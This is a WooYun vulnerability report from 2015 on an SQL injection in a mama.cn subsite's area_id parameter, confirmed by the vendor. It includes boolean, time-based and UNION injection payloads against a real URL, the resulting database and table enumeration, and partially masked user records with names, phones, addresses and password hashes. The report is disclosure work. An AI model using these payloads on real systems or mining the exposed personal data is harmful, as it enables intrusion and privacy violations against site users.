当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108536

漏洞标题:妈妈网某站SQL注射泄露近100万详细用户信息数据

相关厂商:妈妈网

漏洞作者: 路人甲

提交时间:2015-04-17 10:31

修复时间:2015-06-01 14:06

公开时间:2015-06-01 14:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-17: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经确认,细节仅向厂商公开
2015-04-27: 细节向核心白帽子及相关领域专家公开
2015-05-07: 细节向普通白帽子公开
2015-05-17: 细节向实习白帽子公开
2015-06-01: 细节向公众公开

简要描述:

233

详细说明:

http://try.mama.cn/do_ajax.php?area_id=2&do=area
参数id
12-2*5+0+0+1-1 返回 TRUE
12-2*6+0+0+1-1 返回 FALSE
2 AND 2+1-1-1=1 AND 380=380 返回 TRUE
2 AND 3+1-1-1=1 AND 380=380 返回 FALSE
可知,漏洞存在

漏洞证明:

---
Parameter: area_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: area_id=2 AND 9680=9680&do=area
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: area_id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))LJBO)&do=area
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: area_id=2 UNION ALL SELECT CONCAT(0x7176626a71,0x7050487357756666456b,0x717a706b71),NULL,NULL,NULL-- &do=area
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.12
Database: try
[49 tables]
+-----------------------+
| spe_admin | 3个管理员账户
| syw_activity |
。。。。。。
Database: try
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| syw_apply | 1348949 |
| syw_optionvars | 995365 |
| syw_user | 974296 | 97万
Table: syw_user
[10 entries]
+-----+---------+------------+-------------+-------------+------------------------+-------------+---------+---------+---------+---------+--------------------+---------+----------+----------------------------------+----------+----------+---------------+----------+------------+------------+-----------+------------+------------+-------------+-------------+
| id | city_id | discuz_uid | province_id | district_id | email | phone | handle | from | zipcode | updates | address | credits | baby_sex | password | is_start | is_daren | username | realname | add_time | lastvisit | baby_name | baby_birth | babystatus | active_time | update_time |
+-----+---------+------------+-------------+-------------+------------------------+-------------+---------+---------+---------+---------+--------------------+---------+----------+----------------------------------+----------+----------+---------------+----------+------------+------------+-----------+------------+------------+-------------+-------------+
| 401 | 455 | 5430025 | 20 | 0 | 3424**216@qq.com | 13802***81 | <blank> | <blank> | 510160 | 0 | 荔湾区**1B708 | 50 | 0 | e10adc3949ba***6e057f20f883e | 1 | 0 | lad**410216 | 钟** | 0 | 1312902368 | <blank> | 0000-00-00 | 0 | 0 | 0 |
| 400 | 455 | 5189049 | 20 | 0 | 5885**@qq.com | 137***815 | <blank> | <blank> | 501000 | 0 | 荔湾区石路** | 75 | 2 | e10adc3949b**e057f20f883e | 1 | 0 | 懒懒公主 | 周** | 0 | 13073***05 | 龚** | 2009-12-01 | 0 | 0 | 0 |
用户 姓名,电话,家庭住址,账号密码。。。。

修复方案:

这信息要是泄露出去,诈骗事件又会有更多了。还会对用户产生更大的伤害。
希望厂商重视。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-17 14:05

厂商回复:

谢谢

最新状态:

暂无